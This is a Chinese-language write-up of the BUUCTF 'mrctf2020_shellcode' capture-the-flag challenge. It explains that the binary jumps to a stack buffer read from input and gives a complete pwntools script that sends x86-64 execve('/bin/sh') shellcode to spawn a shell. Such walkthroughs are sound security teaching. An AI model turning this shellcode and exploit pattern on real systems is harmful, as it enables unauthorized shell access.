BUUCTF--mrctf2020_shellcode1

这是一题64位的shellocde题,没啥花招入门题。看下保护:


有可执行的段。接着我们看看IDA:


主函数中无法反汇编,那么我们直接看汇编代码。其实很简单,通过系统调用执行puts函数,然后执行read函数。


正在我想如何覆盖返回地址的时候,发现题目直接帮你搞好了。取buf的的地址(栈上)然后跳转到buf位置执行代码。那么我们直接通过read函数构造shellcode就完成了:

python 复制代码
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
io=process('./mrctf2020_shellcode')

shellcode = '''
    mov rbx,0x68732f6e69622f
    push rbx
    push rsp
    pop rdi
    xor esi,esi
    xor edx,edx
    push 0x3b
    pop rax
    syscall
'''


shellcode=asm(shellcode)

io.recvuntil("magic!")

io.sendline(shellcode)

io.interactive()
相关推荐
Codiggerworld9 分钟前
从字节码到JVM:深入理解Java的“一次编写,到处运行”魔法
java·开发语言·jvm
无聊的小坏坏21 分钟前
一文讲通:二分查找的边界处理
数据结构·c++·算法
禾叙_24 分钟前
【netty】Channel
开发语言·javascript·ecmascript
云深处@29 分钟前
【C++11】包装器,智能指针
开发语言·c++
十五年专注C++开发34 分钟前
CMake进阶:SelectLibraryConfigurations模块
c++·cmake·自动化构建
量子炒饭大师36 分钟前
【C++入门】Cyber深度漫游者的初始链路——【类与对象】初始化成员列表
开发语言·c++·dubbo·类与对象·初始化成员列表
独自破碎E42 分钟前
BISHI43 讨厌鬼进货
android·java·开发语言
mmz12071 小时前
逆序对问题(c++)
c++·算法
化学在逃硬闯CS1 小时前
Leetcode110.平衡二叉树
数据结构·c++·算法·leetcode
谢铭轩1 小时前
题解:P8035 [COCI 2015/2016 #7] Otpor
c++·算法